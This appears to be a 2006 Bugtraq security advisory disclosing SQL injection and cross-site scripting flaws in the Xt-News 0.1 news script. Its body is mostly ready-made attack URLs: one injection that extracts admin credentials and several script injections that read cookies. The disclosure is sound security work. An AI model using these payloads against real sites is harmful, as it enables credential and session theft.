bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Xt-News 0.1 : SQL Injection Vulnerability & XSS

from [mr_kaliman] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: Xt-News 0.1 : SQL Injection Vulnerability & XSS
From: mr_kaliman@msn.com
Date: 22 Dec 2006 02:23:48 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
Xt-News 0.1
-----------
Vendor site: http://dreaxteam.free.fr/forums/
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06
 
Description:
------------
SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION]
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT 
id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE 
admin=1#


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS]
http://[victim]/[script_news_path]/add_comment.php?id_news=";><script>alert(document.cookie)</script><foo
 "
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS]
http://[victim]/[script_news_path]/show_news.php?id_news='><script>alert(document.cookie)</script><foo
 '


-------------------
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • Xt-News 0.1 : SQL Injection Vulnerability & XSS, mr_kaliman <=
Previous by Date:  RE: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day, Michele Cicciotti
Next by Date:  rPSA-2006-0234-1 firefox, rPath Update Announcements
Previous by Thread:  PWDumpX updated (includes CacheDump functionality), Reed Arvin
Next by Thread:  rPSA-2006-0234-1 firefox, rPath Update Announcements
Indexes:  [Date] [Thread] [Top] [All Lists]